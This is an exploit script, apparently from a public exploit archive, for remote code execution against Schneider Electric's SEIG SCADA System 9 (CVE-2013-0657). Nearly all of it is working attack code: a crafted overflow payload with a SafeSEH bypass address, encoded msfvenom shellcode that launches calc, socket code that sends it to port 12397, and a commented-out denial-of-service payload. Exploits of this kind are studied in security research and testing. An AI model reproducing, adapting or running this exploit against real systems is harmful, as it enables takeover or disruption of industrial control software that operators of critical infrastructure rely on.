# Title: SEIG SCADA SYSTEM 9 - Remote Code Execution # Author: Alejandro Parodi # Date: 2018-08-17 # Vendor Homepage: https://www.schneider-electric.com # Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/ # Version: v9 # Tested on: Windows7 x86 # CVE: CVE-2013-0657 # References: # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657 import socket import struct ip = "192.168.0.23" port = 12397 con = (ip, port) # DoS Payload found in the research (CRUNCHBASE UNEXPECTED PARAMETER) # length = "\x00\x70\x00\x00\x00\x00\x00\x00" # message = "\x00\x70AA\x65\x00\x00\x00AAAAAAAAAAAAAAAA\x00\x00\x00\x00"+"B"*28644 # payload = length+message # Exploit Magic message_header = struct.pack("<L", 0x6014) + "\x66\x66\x07\x00" message_protocol_data = "\x10\x00\x00\x00" + "\x19" + "\x00\x00\x00\x00\x00" + "\x04" + "\x00\x00\x00" + struct.pack(">H", 0x6000) padding = "B" * 3344 eip_safeseh_bypass_address = struct.pack("<L", 0x0F9C520B) # pop, pop, ret to stack payload in exprsrv.dll (Windows Library without SafeSEH) # Shellcode: ./msfvenom -a x86 --platform windows -p windows/exec cmd=calc EXITFUNC=thread -e x86/shikata_ga_nai -i 5 -b '\x00\xFF\x0A\x0D' -f python # If EXITFUNC is not defined the application enter in a Loop that kill the VM resources nopsleed = "\x41"*100 # \x90 bad char bypass shellcode = "\xda\xcb\xbd\x0f\x83\x69\x70\xd9\x74\x24\xf4\x58\x31" shellcode += "\xc9\xb1\x4b\x83\xe8\xfc\x31\x68\x14\x03\x68\x1b\x61" shellcode += "\x9c\xa9\xcf\xd8\x3a\xb3\x6e\xfc\x1c\x37\x54\xf6\xc7" shellcode += "\x93\x5d\x47\xb3\xd2\x35\xb1\x3f\x7d\xdc\x42\xd7\x81" shellcode += "\x59\x48\x93\x7b\x98\x70\x2a\x6b\x98\x14\xea\xc5\x54" shellcode += "\x17\x7c\x8d\x25\x69\x60\x27\x1e\xc7\x8a\x6a\xd8\xcf" shellcode += "\xb6\xc3\x9d\x5a\x83\xd6\xea\x88\x14\x7d\x5a\x55\x71" shellcode += "\x90\x85\xb8\x37\x9e\x3e\xd7\x1a\x76\xf8\xb1\xb9\x63" shellcode += "\xb7\xef\xa3\xa6\xc0\xb8\x12\xb4\x18\x62\x1a\xe1\x9e" shellcode += "\x6f\x7e\xa2\x86\x6c\xf7\x3a\x31\xbd\x55\x42\x10\xad" shellcode += "\x89\x16\xa0\xb8\x6a\xd6\x4c\x20\xd9\xad\x81\x58\x77" shellcode += "\x0b\xa3\xaa\xba\x2c\x49\xf0\x26\xaa\xab\xce\x5a\xc3" shellcode += "\x41\x69\x60\xc4\x58\x71\x71\x9c\x3f\xbe\xc2\xbc\x49" shellcode += "\xdd\xab\x89\xf0\x46\xcb\x1a\x8a\xf1\xdb\xe5\x54\x1f" shellcode += "\xfb\x30\x3b\xb1\x17\x97\xb2\x3e\x31\xf8\x26\x13\x9c" shellcode += "\x16\xdd\x26\x7a\xe3\x9b\x6e\x29\x77\x49\xc7\x97\x98" shellcode += "\x39\x7b\x5f\xcd\xeb\x4a\x39\x6e\x66\x04\xbc\x6c\xa6" shellcode += "\x87\x01\x63\x4d\xf3\x35\xc9\x74\x35\xdf\xe7\x1f\x0c" shellcode += "\xd0\x69\x80\x8c\x5c\xde\x63\xfc\x19\x1b\x8e\x24\x3b" shellcode += "\x7e\x01\x97\x6f\x67\x8f\x07\x3f\x32\x13\x23\x80\x7e" shellcode += "\x9a\x01\x5a\xc0\x3c\xf9\xf5\x5a\x04\xb0\x54\x46\x0c" shellcode += "\xfb\x21\x4d\xd7\xe0\xb4\x02\xe5\x4c\x04\x5a\x5e\x37" shellcode += "\xd1\x61\x6d\xe1\x4d\xe8\xa8\xdf\x26\xdb\x55\x5a\x60" shellcode += "\x85\x68\x05\x6a\x21\x73\xdf\x73\xa4\xef\x26\x02\x7e" shellcode += "\xb0\xb1\xa6\xb1\xac\x15\x0f\x80\x34\xae\xe4\x8a" JUNK = "JUNK"*5202 # 20808 Bytes of JUNK payload = message_header + message_protocol_data + padding + eip_safeseh_bypass_address + nopsleed + shellcode + JUNK print "Payload length: "+str(len(payload)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(con) s.send(payload) s.recv(10)